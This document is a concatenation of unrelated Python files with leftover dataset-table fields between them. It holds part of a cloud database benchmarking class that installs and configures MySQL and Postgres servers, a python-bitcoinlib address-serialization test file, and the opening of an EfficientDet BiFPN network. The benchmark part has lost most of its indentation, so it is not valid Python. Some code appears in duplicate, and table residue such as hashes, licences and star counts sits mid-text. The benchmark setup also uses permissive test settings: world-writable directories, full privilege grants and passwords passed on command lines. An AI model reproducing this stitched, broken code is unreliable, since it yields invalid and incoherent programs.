def MakePsqlConnectionString(self, database_name, use_localhost=False):
return '\'host={0} user={1} password={2} dbname={3}\''.format(
self.endpoint if not use_localhost else 'localhost',
self.spec.database_username, self.spec.database_password, database_name)
def MakeMysqlConnectionString(self, use_localhost=False):
return '-h {0}{1} -u {2} -p{3}'.format(
self.endpoint if not use_localhost else 'localhost',
' -P 3306' if not self.is_managed_db else '',
self.spec.database_username, self.spec.database_password)
def MakeSysbenchConnectionString(self):
return (
'--mysql-host={0}{1} --mysql-user={2} --mysql-password="{3}" ').format(
self.endpoint,
' --mysql-port=3306' if not self.is_managed_db else '',
self.spec.database_username, self.spec.database_password)
def MakeMysqlCommand(self, command, use_localhost=False):
return 'mysql %s -e "%s"' % (self.MakeMysqlConnectionString(
use_localhost=use_localhost), command)
def MakeSqlserverCommand(self, command, use_localhost=False):
return '/opt/mssql-tools/bin/sqlcmd -S %s -U %s -P %s -Q "%s"' % (
self.endpoint if not use_localhost else 'localhost',
self.spec.database_username, self.spec.database_password, command)
def MakePostgresCommand(self, db_name, command, use_localhost=False):
return 'psql %s -c "%s"' % (self.MakePsqlConnectionString(
db_name, use_localhost), command)
@property
def endpoint(self):
if not hasattr(self, '_endpoint'):
raise RelationalDbPropertyNotSet('endpoint not set')
return self._endpoint
@endpoint.setter
def endpoint(self, endpoint):
self._endpoint = endpoint
@property
def port(self):
if not hasattr(self, '_port'):
raise RelationalDbPropertyNotSet('port not set')
return self._port
@port.setter
def port(self, port):
self._port = int(port)
def GetResourceMetadata(self):
metadata = {
'zone': self.spec.db_spec.zone,
'disk_type': self.spec.db_disk_spec.disk_type,
'disk_size': self.spec.db_disk_spec.disk_size,
'engine': self.spec.engine,
'high_availability': self.spec.high_availability,
'backup_enabled': self.spec.backup_enabled,
'backup_start_time': self.spec.backup_start_time,
'engine_version': self.spec.engine_version,
'client_vm_zone': self.spec.vm_groups['clients'].vm_spec.zone,
'use_managed_db': self.is_managed_db,
'instance_id': self.instance_id,
'client_vm_disk_type':
self.spec.vm_groups['clients'].disk_spec.disk_type,
'client_vm_disk_size':
self.spec.vm_groups['clients'].disk_spec.disk_size,
}
if not self.is_managed_db and self.spec.engine == 'mysql':
metadata.update({
'unmanaged_db_innodb_buffer_pool_size_gb':
self.innodb_buffer_pool_size,
'unmanaged_db_innodb_log_file_size_mb':
self.innodb_log_file_size,
'unmanaged_db_mysql_bin_log':
self.mysql_bin_log
})
if not self.is_managed_db and self.spec.engine == 'postgres':
metadata.update({
'postgres_shared_buffer_size':
self.postgres_shared_buffer_size
})
if (hasattr(self.spec.db_spec, 'machine_type') and
self.spec.db_spec.machine_type):
metadata.update({
'machine_type': self.spec.db_spec.machine_type,
})
elif hasattr(self.spec.db_spec, 'cpus') and (hasattr(
self.spec.db_spec, 'memory')):
metadata.update({
'cpus': self.spec.db_spec.cpus,
})
metadata.update({
'memory': self.spec.db_spec.memory,
})
elif hasattr(self.spec.db_spec, 'tier') and (hasattr(
self.spec.db_spec, 'compute_units')):
metadata.update({
'tier': self.spec.db_spec.tier,
})
metadata.update({
'compute_units': self.spec.db_spec.compute_units,
})
else:
raise RelationalDbPropertyNotSet(
'Machine type of the database must be set.')
if (hasattr(self.spec.vm_groups['clients'].vm_spec, 'machine_type') and
self.spec.vm_groups['clients'].vm_spec.machine_type):
metadata.update({
'client_vm_machine_type':
self.spec.vm_groups['clients'].vm_spec.machine_type,
})
elif hasattr(self.spec.vm_groups['clients'].vm_spec, 'cpus') and (hasattr(
self.spec.vm_groups['clients'].vm_spec, 'memory')):
metadata.update({
'client_vm_cpus': self.spec.vm_groups['clients'].vm_spec.cpus,
})
metadata.update({
'client_vm_memory': self.spec.vm_groups['clients'].vm_spec.memory,
})
else:
raise RelationalDbPropertyNotSet(
'Machine type of the client VM must be set.')
if FLAGS.db_flags:
metadata.update({
'db_flags': FLAGS.db_flags,
})
return metadata
@abstractmethod
def GetDefaultEngineVersion(self, engine):
def _PostCreate(self):
self._ApplyDbFlags()
def _IsReadyUnmanaged(self):
if self.is_managed_db:
raise Exception('Checking state of unmanaged database when the database '
'is managed.')
if self.spec.engine == 'mysql':
if (self.spec.engine_version == '5.6' or
self.spec.engine_version.startswith('5.6.')):
mysql_name = 'mysql56'
elif (self.spec.engine_version == '5.7' or
self.spec.engine_version.startswith('5.7.')):
mysql_name = 'mysql57'
elif (self.spec.engine_version == '8.0' or
self.spec.engine_version.startswith('8.0.')):
mysql_name = 'mysql80'
else:
raise Exception('Invalid database engine version: %s. Only 5.6 and 5.7 '
'and 8.0 are supported.' % self.spec.engine_version)
stdout, stderr = self.server_vm.RemoteCommand(
'sudo service %s status' % self.server_vm.GetServiceName(mysql_name))
return stdout and not stderr
elif self.spec.engine == 'postgres':
stdout, stderr = self.server_vm.RemoteCommand(
'sudo service postgresql status')
return stdout and not stderr
raise UnsupportedError('%s engine is not supported '
'for unmanaged database.' % self.spec.engine)
def _InstallMySQLClient(self):
if (self.spec.engine_version == '5.6' or
self.spec.engine_version.startswith('5.6.')):
mysql_name = 'mysqlclient56'
elif (self.spec.engine_version == '5.7' or
self.spec.engine_version.startswith('5.7') or
self.spec.engine_version == '8.0' or
self.spec.engine_version.startswith('8.0')):
mysql_name = 'mysqlclient'
else:
raise Exception('Invalid database engine version: %s. Only 5.6, 5.7 '
'and 8.0 are supported.' % self.spec.engine_version)
self.client_vm.Install(mysql_name)
self.client_vm.RemoteCommand(
'sudo sed -i '
'"s/max_allowed_packet\t= 16M/max_allowed_packet\t= 1024M/g" %s' %
self.client_vm.GetPathToConfig(mysql_name))
self.client_vm.RemoteCommand(
'sudo cat %s' % self.client_vm.GetPathToConfig(mysql_name),
should_log=True)
def _PrepareDataDirectories(self, mysql_name):
self.server_vm.RemoteCommand('sudo mkdir -p /scratch/mysql')
self.server_vm.RemoteCommand('sudo mkdir -p /scratch/tmp')
self.server_vm.RemoteCommand('sudo chown mysql:mysql /scratch/mysql')
self.server_vm.RemoteCommand('sudo chown mysql:mysql /scratch/tmp')
# Copy all the contents of the default data directories to the new ones.
self.server_vm.RemoteCommand(
'sudo rsync -avzh /var/lib/mysql/ /scratch/mysql')
self.server_vm.RemoteCommand('sudo rsync -avzh /tmp/ /scratch/tmp')
self.server_vm.RemoteCommand('df', should_log=True)
# Configure AppArmor.
self.server_vm.RemoteCommand(
'echo "alias /var/lib/mysql -> /scratch/mysql," | sudo tee -a '
'/etc/apparmor.d/tunables/alias')
self.server_vm.RemoteCommand(
'echo "alias /tmp -> /scratch/tmp," | sudo tee -a '
'/etc/apparmor.d/tunables/alias')
self.server_vm.RemoteCommand(
'sudo sed -i '
'"s|# Allow data files dir access|'
' /scratch/mysql/ r, /scratch/mysql/** rwk, /scratch/tmp/ r, '
'/scratch/tmp/** rwk, /proc/*/status r, '
'/sys/devices/system/node/ r, /sys/devices/system/node/node*/meminfo r,'
' /sys/devices/system/node/*/* r, /sys/devices/system/node/* r, '
'# Allow data files dir access|g" /etc/apparmor.d/usr.sbin.mysqld')
self.server_vm.RemoteCommand(
'sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.mysqld')
self.server_vm.RemoteCommand('sudo systemctl restart apparmor')
# Finally, change the MySQL data directory.
self.server_vm.RemoteCommand(
'sudo sed -i '
'"s|datadir\t\t= /var/lib/mysql|datadir\t\t= /scratch/mysql|g" '
'%s' % self.server_vm.GetPathToConfig(mysql_name))
self.server_vm.RemoteCommand(
'sudo sed -i '
'"s|tmpdir\t\t= /tmp|tmpdir\t\t= /scratch/tmp|g" '
'%s' % self.server_vm.GetPathToConfig(mysql_name))
def _SetupUnmanagedDatabase(self):
db_engine = self.spec.engine
if self.client_vm.IS_REBOOTABLE:
self.client_vm.ApplySysctlPersistent({
'net.ipv4.tcp_keepalive_time': 100,
'net.ipv4.tcp_keepalive_intvl': 100,
'net.ipv4.tcp_keepalive_probes': 10
})
if self.server_vm.IS_REBOOTABLE:
self.server_vm.ApplySysctlPersistent({
'net.ipv4.tcp_keepalive_time': 100,
'net.ipv4.tcp_keepalive_intvl': 100,
'net.ipv4.tcp_keepalive_probes': 10
})
if db_engine == 'mysql':
self._InstallMySQLServer()
elif db_engine == 'postgres':
self._InstallPostgresServer()
else:
raise Exception(
'Engine {0} not supported for unmanaged databases.'.format(
self.spec.engine))
def _InstallPostgresServer(self):
if self.spec.engine_version == POSTGRES_13_VERSION:
self.server_vm.Install('postgres13')
else:
raise UnsupportedError('Only postgres version 13 is currently supported')
vm = self.server_vm
version = self.spec.engine_version
postgres_conf_path = POSTGRES_CONFIG_PATH.format(version)
postgres_conf_file = postgres_conf_path + POSTGRES_CONFIG
postgres_hba_conf_file = postgres_conf_path + POSTGRES_HBA_CONFIG
vm.PushFile(data.ResourcePath(
posixpath.join(POSTGRES_RESOURCE_PATH, POSTGRES_HBA_CONFIG)))
vm.RemoteCommand('sudo -u postgres psql postgres -c '
'"ALTER USER postgres PASSWORD \'%s\';"'
% self.spec.database_password)
vm.RemoteCommand('sudo -u postgres psql postgres -c '
'"CREATE ROLE %s LOGIN SUPERUSER PASSWORD \'%s\';"' %
(self.spec.database_username,
self.spec.database_password))
# Change the directory to scratch
vm.RemoteCommand(
'sudo sed -i.bak '
'"s:\'/var/lib/postgresql/{0}/main\':\'{1}/postgresql/{0}/main\':" '
'/etc/postgresql/{0}/main/postgresql.conf'.format(
version, self.server_vm.GetScratchDir()))
# Accept remote connection
vm.RemoteCommand(
'sudo sed -i.bak '
r'"s:\#listen_addresses ='
' \'localhost\':listen_addresses = \'*\':" '
'{}'.format(postgres_conf_file))
# Set the size of the shared buffer
vm.RemoteCommand(
'sudo sed -i.bak "s:#shared_buffers = 128MB:shared_buffers = {}GB:" '
'{}'.format(self.postgres_shared_buffer_size, postgres_conf_file))
# Update data path to new location
vm.RemoteCommand('sudo rsync -av /var/lib/postgresql /scratch')
# # Use cat to move files because mv will override file permissions
self.server_vm.RemoteCommand(
"sudo bash -c "
"'cat pg_hba.conf > "
"{}'".format(postgres_hba_conf_file))
self.server_vm.RemoteCommand(
'sudo cat {}'.format(postgres_conf_file))
self.server_vm.RemoteCommand(
'sudo cat {}'.format(postgres_hba_conf_file))
vm.RemoteCommand('sudo systemctl restart postgresql')
  def _InstallMySQLServer(self):
    """Installs and configures an unmanaged MySQL server on server_vm.

    Supports engine versions 5.6, 5.7 and 8.0 (including patch releases
    such as "5.7.x").  After installing the package the method relocates
    the data directories onto the scratch disk, applies minimal InnoDB
    tuning, opens the server to remote connections, then creates the
    benchmark user and grants it full privileges.

    Raises:
      Exception: if spec.engine_version is not a supported MySQL version.
    """
    if (self.spec.engine_version == '5.6' or
        self.spec.engine_version.startswith('5.6.')):
      mysql_name = 'mysql56'
    elif (self.spec.engine_version == '5.7' or
          self.spec.engine_version.startswith('5.7.')):
      mysql_name = 'mysql57'
    elif (self.spec.engine_version == '8.0' or
          self.spec.engine_version.startswith('8.0.')):
      mysql_name = 'mysql80'
    else:
      raise Exception('Invalid database engine version: %s. Only 5.6 and 5.7 '
                      'and 8.0 are supported.' % self.spec.engine_version)
    self.server_vm.Install(mysql_name)
    # Open up the scratch dir so the mysql user can relocate data into it.
    self.server_vm.RemoteCommand('chmod 777 %s' %
                                 self.server_vm.GetScratchDir())
    self.server_vm.RemoteCommand('sudo service %s stop' %
                                 self.server_vm.GetServiceName(mysql_name))
    self._PrepareDataDirectories(mysql_name)
    # Minimal MySQL tuning; see AWS whitepaper in docstring.
    innodb_buffer_pool_gb = self.innodb_buffer_pool_size
    innodb_log_file_mb = self.innodb_log_file_size
    self.server_vm.RemoteCommand(
        'echo "\n'
        f'innodb_buffer_pool_size = {innodb_buffer_pool_gb}G\n'
        'innodb_flush_method = O_DIRECT\n'
        'innodb_flush_neighbors = 0\n'
        f'innodb_log_file_size = {innodb_log_file_mb}M'
        '" | sudo tee -a %s' % self.server_vm.GetPathToConfig(mysql_name))
    if self.mysql_bin_log:
      # Enable the binary log (e.g. for replication-style benchmarks).
      self.server_vm.RemoteCommand('echo "\n'
                                   'server-id  = 1\n'
                                   'log_bin = /var/log/mysql/mysql-bin.log\n'
                                   '" | sudo tee -a %s' %
                                   self.server_vm.GetPathToConfig(mysql_name))
    # These (and max_connections after restarting) help avoid losing connection.
    self.server_vm.RemoteCommand(
        'echo "\nskip-name-resolve\n'
        'connect_timeout = 86400\n'
        'wait_timeout = 86400\n'
        'interactive_timeout = 86400" | sudo tee -a %s' %
        self.server_vm.GetPathToConfig(mysql_name))
    # Comment out bind-address so the server listens on all interfaces.
    self.server_vm.RemoteCommand('sudo sed -i "s/bind-address/#bind-address/g" '
                                 '%s' %
                                 self.server_vm.GetPathToConfig(mysql_name))
    # Raise max_allowed_packet (the \t below are literal tabs in the config).
    self.server_vm.RemoteCommand(
        'sudo sed -i '
        '"s/max_allowed_packet\t= 16M/max_allowed_packet\t= 1024M/g" %s' %
        self.server_vm.GetPathToConfig(mysql_name))
    # Configure logging (/var/log/mysql/error.log will print upon db deletion).
    self.server_vm.RemoteCommand(
        'echo "\nlog_error_verbosity = 3" | sudo tee -a %s' %
        self.server_vm.GetPathToConfig(mysql_name))
    self.server_vm.RemoteCommand(
        'sudo cat /etc/mysql/mysql.conf.d/mysql.sock',
        should_log=True,
        ignore_failure=True)
    # Restart.
    self.server_vm.RemoteCommand('sudo service %s restart' %
                                 self.server_vm.GetServiceName(mysql_name))
    self.server_vm.RemoteCommand(
        'sudo cat %s' % self.server_vm.GetPathToConfig(mysql_name),
        should_log=True)
    # Raise max_connections at runtime so many benchmark clients can connect.
    self.server_vm.RemoteCommand(
        self.MakeMysqlCommand(
            'SET GLOBAL max_connections=8000;', use_localhost=True))
    # The client connects over the internal network when available.
    if FLAGS.ip_addresses == vm_util.IpAddressSubset.INTERNAL:
      client_ip = self.client_vm.internal_ip
    else:
      client_ip = self.client_vm.ip_address
    self.server_vm.RemoteCommand(
        self.MakeMysqlCommand(
            'CREATE USER \'%s\'@\'%s\' IDENTIFIED BY \'%s\';' %
            (self.spec.database_username, client_ip,
             self.spec.database_password),
            use_localhost=True))
    self.server_vm.RemoteCommand(
        self.MakeMysqlCommand(
            'GRANT ALL PRIVILEGES ON *.* TO \'%s\'@\'%s\';' %
            (self.spec.database_username, client_ip),
            use_localhost=True))
    self.server_vm.RemoteCommand(
        self.MakeMysqlCommand('FLUSH PRIVILEGES;', use_localhost=True))
def _ApplyDbFlags(self):
if FLAGS.db_flags:
if self.is_managed_db:
self._ApplyManagedDbFlags()
else:
if self.spec.engine == MYSQL:
self._ApplyMySqlFlags()
else:
raise NotImplementedError('Flags is not supported on %s' %
self.spec.engine)
def _ApplyManagedDbFlags(self):
raise NotImplementedError('Managed Db flags is not supported for %s' %
type(self).__name__)
def _ApplyMySqlFlags(self):
if FLAGS.db_flags:
for flag in FLAGS.db_flags:
cmd = self.MakeMysqlCommand('SET %s;' % flag)
_, stderr, _ = vm_util.IssueCommand(cmd, raise_on_failure=False)
if stderr:
raise Exception('Invalid MySQL flags: %s' % stderr)
def PrintUnmanagedDbStats(self):
if self.spec.engine == 'mysql':
self.server_vm.RemoteCommand('sudo cat /var/log/mysql/error.log')
self.server_vm.RemoteCommand(
'mysql %s -e "SHOW GLOBAL STATUS LIKE \'Aborted_connects\';"' %
self.MakeMysqlConnectionString(use_localhost=True))
self.server_vm.RemoteCommand(
'mysql %s -e "SHOW GLOBAL STATUS LIKE \'Aborted_clients\';"' %
self.MakeMysqlConnectionString(use_localhost=True))
def Failover(self):
if not self.spec.high_availability:
raise Exception('Attempt to fail over a database that isn\'t marked '
'as high available')
self._FailoverHA()
  @abstractmethod
  def _FailoverHA(self):
    """Provider-specific high-availability failover; subclasses implement."""
    pass
| true | true |
f7fa1fedc19429389b6a3bc8e1bb2c09924aaec3 | 2,230 | py | Python | glue/bitcoinlib/tests/test_net.py | LykkeCity/Notary | 416c2c11c73e9caaf23a7c3a8eaae30a090823d4 | [
"MIT"
] | null | null | null | glue/bitcoinlib/tests/test_net.py | LykkeCity/Notary | 416c2c11c73e9caaf23a7c3a8eaae30a090823d4 | [
"MIT"
] | null | null | null | glue/bitcoinlib/tests/test_net.py | LykkeCity/Notary | 416c2c11c73e9caaf23a7c3a8eaae30a090823d4 | [
"MIT"
] | 4 | 2015-12-15T20:16:05.000Z | 2020-09-08T07:29:51.000Z | # Copyright (C) 2013-2014 The python-bitcoinlib developers
#
# This file is part of python-bitcoinlib.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of python-bitcoinlib, including this file, may be copied, modified,
# propagated, or distributed except according to the terms contained in the
# LICENSE file.
import unittest
from bitcoinlib.net import CAddress
class Test_CAddress(unittest.TestCase):
    """Round-trip serialization tests for the CAddress network-address type."""

    def test_serializationSimple(self):
        # A default-constructed address must survive serialize/deserialize.
        addr = CAddress()
        wire = addr.serialize()
        round_tripped = CAddress.deserialize(wire)
        self.assertEqual(wire, round_tripped.serialize())

    def test_serializationIPv4(self):
        addr = CAddress()
        addr.ip = "1.1.1.1"
        addr.port = 8333
        addr.nTime = 1420576401
        wire = addr.serialize()
        round_tripped = CAddress.deserialize(wire)
        self.assertEqual(addr, round_tripped)
        self.assertEqual(wire, round_tripped.serialize())

    def test_serializationIPv6(self):
        addr = CAddress()
        addr.ip = "1234:ABCD:1234:ABCD:1234:00:ABCD:1234"
        addr.port = 8333
        addr.nTime = 1420576401
        wire = addr.serialize()
        round_tripped = CAddress.deserialize(wire)
        self.assertEqual(addr, round_tripped)
        self.assertEqual(wire, round_tripped.serialize())

    def test_serializationDiff(self):
        # Serialization must preserve observable differences between addresses.
        first = CAddress()
        first.ip = "1.1.1.1"
        first.port = 8333
        first.nTime = 1420576401
        second = CAddress()
        second.ip = "1.1.1.2"
        second.port = 8333
        second.nTime = 1420576401
        self.assertNotEqual(first, second)
        first_wire = first.serialize()
        second_wire = second.serialize()
        self.assertNotEqual(first_wire, second_wire)
        self.assertNotEqual(CAddress.deserialize(first_wire),
                            CAddress.deserialize(second_wire))
| 28.961039 | 79 | 0.670852 |
import unittest
from bitcoinlib.net import CAddress
class Test_CAddress(unittest.TestCase):
    """Serialization round-trip tests for the CAddress network-address type."""

    def test_serializationSimple(self):
        """A default CAddress must serialize identically after a round trip."""
        c = CAddress()
        cSerialized = c.serialize()
        cDeserialized = CAddress.deserialize(cSerialized)
        cSerializedTwice = cDeserialized.serialize()
        self.assertEqual(cSerialized, cSerializedTwice)

    def test_serializationIPv4(self):
        """An IPv4 address round-trips with all fields preserved."""
        c = CAddress()
        c.ip = "1.1.1.1"
        c.port = 8333
        c.nTime = 1420576401
        cSerialized = c.serialize()
        cDeserialized = CAddress.deserialize(cSerialized)
        self.assertEqual(c, cDeserialized)
        cSerializedTwice = cDeserialized.serialize()
        self.assertEqual(cSerialized, cSerializedTwice)

    def test_serializationIPv6(self):
        """An IPv6 address round-trips with all fields preserved."""
        c = CAddress()
        c.ip = "1234:ABCD:1234:ABCD:1234:00:ABCD:1234"
        c.port = 8333
        c.nTime = 1420576401
        cSerialized = c.serialize()
        cDeserialized = CAddress.deserialize(cSerialized)
        self.assertEqual(c, cDeserialized)
        cSerializedTwice = cDeserialized.serialize()
        self.assertEqual(cSerialized, cSerializedTwice)

    def test_serializationDiff(self):
        """Sanity check that serialization preserves differences."""
        c1 = CAddress()
        c1.ip = "1.1.1.1"
        c1.port = 8333
        c1.nTime = 1420576401
        c2 = CAddress()
        c2.ip = "1.1.1.2"
        c2.port = 8333
        c2.nTime = 1420576401
        self.assertNotEqual(c1, c2)
        c1Serialized = c1.serialize()
        c2Serialized = c2.serialize()
        self.assertNotEqual(c1Serialized, c2Serialized)
        c1Deserialized = CAddress.deserialize(c1Serialized)
        c2Deserialized = CAddress.deserialize(c2Serialized)
        self.assertNotEqual(c1Deserialized, c2Deserialized)
| true | true |
f7fa20167068a39de4cb6d6e77b77da288bcf085 | 23,706 | py | Python | nets/efficientdet.py | Quentin-kt/efficientdet-pytorch | 6a013481f9264a065ff1e3c5affe3102ef6066ce | [
"MIT"
] | null | null | null | nets/efficientdet.py | Quentin-kt/efficientdet-pytorch | 6a013481f9264a065ff1e3c5affe3102ef6066ce | [
"MIT"
] | null | null | null | nets/efficientdet.py | Quentin-kt/efficientdet-pytorch | 6a013481f9264a065ff1e3c5affe3102ef6066ce | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from utils.anchors import Anchors
from nets.efficientnet import EfficientNet as EffNet
from nets.layers import (Conv2dStaticSamePadding, MaxPool2dStaticSamePadding,
MemoryEfficientSwish, Swish)
#----------------------------------#
#   Depthwise separable convolution
#   as in Xception: a 3x3 depthwise
#   conv followed by a 1x1 pointwise
#   conv.
#----------------------------------#
class SeparableConvBlock(nn.Module):
    """Depthwise-separable convolution: a 3x3 depthwise conv followed by a
    1x1 pointwise conv, with optional BatchNorm and Swish activation.

    Spatial size is preserved; channels go from in_channels to out_channels
    (defaulting to in_channels).
    """

    def __init__(self, in_channels, out_channels=None, norm=True, activation=False, onnx_export=False):
        super(SeparableConvBlock, self).__init__()
        out_channels = in_channels if out_channels is None else out_channels
        # groups=in_channels makes the 3x3 conv depthwise; the 1x1 conv
        # then mixes channels (and carries the bias).
        self.depthwise_conv = Conv2dStaticSamePadding(
            in_channels, in_channels, kernel_size=3, stride=1,
            groups=in_channels, bias=False)
        self.pointwise_conv = Conv2dStaticSamePadding(
            in_channels, out_channels, kernel_size=1, stride=1)
        self.norm = norm
        if norm:
            self.bn = nn.BatchNorm2d(num_features=out_channels, momentum=0.01, eps=1e-3)
        self.activation = activation
        if activation:
            # The plain Swish is used for ONNX export compatibility.
            self.swish = Swish() if onnx_export else MemoryEfficientSwish()

    def forward(self, x):
        out = self.pointwise_conv(self.depthwise_conv(x))
        if self.norm:
            out = self.bn(out)
        return self.swish(out) if self.activation else out
class BiFPN(nn.Module):
    """Weighted bidirectional feature pyramid network (BiFPN) layer.

    Fuses the five pyramid levels P3..P7 with one top-down and one
    bottom-up pass.  With ``attention=True`` each fusion uses fast
    normalized (ReLU-clipped, sum-normalized) weights; otherwise the
    inputs are simply summed.
    """

    def __init__(self, num_channels, conv_channels, first_time=False, epsilon=1e-4, onnx_export=False, attention=True):
        super(BiFPN, self).__init__()
        # epsilon keeps the fast-normalized-fusion denominators non-zero.
        self.epsilon = epsilon
        # Separable convs applied after each top-down ("up") and
        # bottom-up ("down") fusion step.
        self.conv6_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
        self.conv5_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
        self.conv4_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
        self.conv3_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
        self.conv4_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
        self.conv5_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
        self.conv6_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
        self.conv7_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
        # 2x nearest-neighbor upsampling for the top-down path.
        self.p6_upsample = nn.Upsample(scale_factor=2, mode='nearest')
        self.p5_upsample = nn.Upsample(scale_factor=2, mode='nearest')
        self.p4_upsample = nn.Upsample(scale_factor=2, mode='nearest')
        self.p3_upsample = nn.Upsample(scale_factor=2, mode='nearest')
        # 3x3/stride-2 max pooling for the bottom-up path.
        self.p4_downsample = MaxPool2dStaticSamePadding(3, 2)
        self.p5_downsample = MaxPool2dStaticSamePadding(3, 2)
        self.p6_downsample = MaxPool2dStaticSamePadding(3, 2)
        self.p7_downsample = MaxPool2dStaticSamePadding(3, 2)
        self.swish = MemoryEfficientSwish() if not onnx_export else Swish()
        self.first_time = first_time
        if self.first_time:
            # Take the last three EfficientNet feature maps and compress
            # their channel counts down to num_channels.
            self.p5_down_channel = nn.Sequential(
                Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
                nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
            )
            self.p4_down_channel = nn.Sequential(
                Conv2dStaticSamePadding(conv_channels[1], num_channels, 1),
                nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
            )
            self.p3_down_channel = nn.Sequential(
                Conv2dStaticSamePadding(conv_channels[0], num_channels, 1),
                nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
            )
            # Downsample the incoming P5 in width/height (and adjust
            # channels) to build P6.
            self.p5_to_p6 = nn.Sequential(
                Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
                nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
                MaxPool2dStaticSamePadding(3, 2)
            )
            self.p6_to_p7 = nn.Sequential(
                MaxPool2dStaticSamePadding(3, 2)
            )
            # On the first BiFPN round the skip connections use their own
            # channel-reduced copies of C4/C5, not the same tensors as the
            # top-down path.
            self.p4_down_channel_2 = nn.Sequential(
                Conv2dStaticSamePadding(conv_channels[1], num_channels, 1),
                nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
            )
            self.p5_down_channel_2 = nn.Sequential(
                Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
                nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
            )
        # Learnable weights of the simple (fast normalized fusion)
        # attention mechanism, one weight per fused input.
        self.p6_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
        self.p6_w1_relu = nn.ReLU()
        self.p5_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
        self.p5_w1_relu = nn.ReLU()
        self.p4_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
        self.p4_w1_relu = nn.ReLU()
        self.p3_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
        self.p3_w1_relu = nn.ReLU()
        self.p4_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
        self.p4_w2_relu = nn.ReLU()
        self.p5_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
        self.p5_w2_relu = nn.ReLU()
        self.p6_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
        self.p6_w2_relu = nn.ReLU()
        self.p7_w2 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
        self.p7_w2_relu = nn.ReLU()
        self.attention = attention

    def forward(self, inputs):
        """ bifpn模块结构示意图
            P7_0 -------------------------> P7_2 -------->
               |-------------|                ↑
                             ↓                |
            P6_0 ---------> P6_1 ---------> P6_2 -------->
               |-------------|--------------↑ ↑
                             ↓                |
            P5_0 ---------> P5_1 ---------> P5_2 -------->
               |-------------|--------------↑ ↑
                             ↓                |
            P4_0 ---------> P4_1 ---------> P4_2 -------->
               |-------------|--------------↑ ↑
                             |--------------↓ |
            P3_0 -------------------------> P3_2 -------->
        """
        # Diagram above: X_0 are inputs, X_1 the top-down intermediates,
        # X_2 the bottom-up outputs.
        if self.attention:
            p3_out, p4_out, p5_out, p6_out, p7_out = self._forward_fast_attention(inputs)
        else:
            p3_out, p4_out, p5_out, p6_out, p7_out = self._forward(inputs)
        return p3_out, p4_out, p5_out, p6_out, p7_out

    def _forward_fast_attention(self, inputs):
        #------------------------------------------------#
        #   Fast attention is used when phi = 1..5.
        #   Receives three effective feature maps:
        #   C3 64, 64, 40
        #   C4 32, 32, 112
        #   C5 16, 16, 320
        #   (shapes quoted for the D0 input size)
        #------------------------------------------------#
        if self.first_time:
            #------------------------------------------------------------------------#
            #   The first BiFPN round needs downsampling and channel
            #   adjustment to obtain p3_in, p4_in, p5_in, p6_in, p7_in.
            #------------------------------------------------------------------------#
            p3, p4, p5 = inputs
            #-------------------------------------------#
            #   Adjust channel count first:
            #   C3 64, 64, 40 -> 64, 64, 64
            #-------------------------------------------#
            p3_in = self.p3_down_channel(p3)
            #-------------------------------------------#
            #   Adjust channel count first (two copies:
            #   one for the top-down path, one skip):
            #   C4 32, 32, 112 -> 32, 32, 64
            #                  -> 32, 32, 64
            #-------------------------------------------#
            p4_in_1 = self.p4_down_channel(p4)
            p4_in_2 = self.p4_down_channel_2(p4)
            #-------------------------------------------#
            #   Adjust channel count first (two copies):
            #   C5 16, 16, 320 -> 16, 16, 64
            #                  -> 16, 16, 64
            #-------------------------------------------#
            p5_in_1 = self.p5_down_channel(p5)
            p5_in_2 = self.p5_down_channel_2(p5)
            #-------------------------------------------#
            #   Downsample C5, adjusting channels and size:
            #   C5 16, 16, 320 -> 8, 8, 64
            #-------------------------------------------#
            p6_in = self.p5_to_p6(p5)
            #-------------------------------------------#
            #   Downsample P6_in spatially:
            #   P6_in 8, 8, 64 -> 4, 4, 64
            #-------------------------------------------#
            p7_in = self.p6_to_p7(p6_in)
            # Simple attention: weighs p7_in against p6_in.
            p6_w1 = self.p6_w1_relu(self.p6_w1)
            weight = p6_w1 / (torch.sum(p6_w1, dim=0) + self.epsilon)
            p6_td= self.conv6_up(self.swish(weight[0] * p6_in + weight[1] * self.p6_upsample(p7_in)))
            # Simple attention: weighs p6_up against p5_in.
            p5_w1 = self.p5_w1_relu(self.p5_w1)
            weight = p5_w1 / (torch.sum(p5_w1, dim=0) + self.epsilon)
            p5_td= self.conv5_up(self.swish(weight[0] * p5_in_1 + weight[1] * self.p5_upsample(p6_td)))
            # Simple attention: weighs p5_up against p4_in.
            p4_w1 = self.p4_w1_relu(self.p4_w1)
            weight = p4_w1 / (torch.sum(p4_w1, dim=0) + self.epsilon)
            p4_td= self.conv4_up(self.swish(weight[0] * p4_in_1 + weight[1] * self.p4_upsample(p5_td)))
            # Simple attention: weighs p4_up against p3_in.
            p3_w1 = self.p3_w1_relu(self.p3_w1)
            weight = p3_w1 / (torch.sum(p3_w1, dim=0) + self.epsilon)
